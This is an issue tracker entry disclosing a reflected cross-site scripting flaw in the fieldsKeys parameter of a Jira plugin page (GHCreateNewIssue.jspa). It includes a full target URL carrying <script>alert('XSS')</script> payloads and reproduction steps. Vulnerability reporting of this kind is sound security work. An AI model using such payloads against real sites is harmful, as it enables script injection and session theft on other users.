XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

XMLWordPrintable

    • 5.1

      Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1
      Reproduction:
      After login open target URL in browser.
      Apply attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.

        1. Screen Shot 2012-08-07 at 1.36.24 PM.png
          55 kB
          Peter Obara

            Assignee:
            Unassigned
            Reporter:
            David Black
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

              Created:
              Updated:
              Resolved: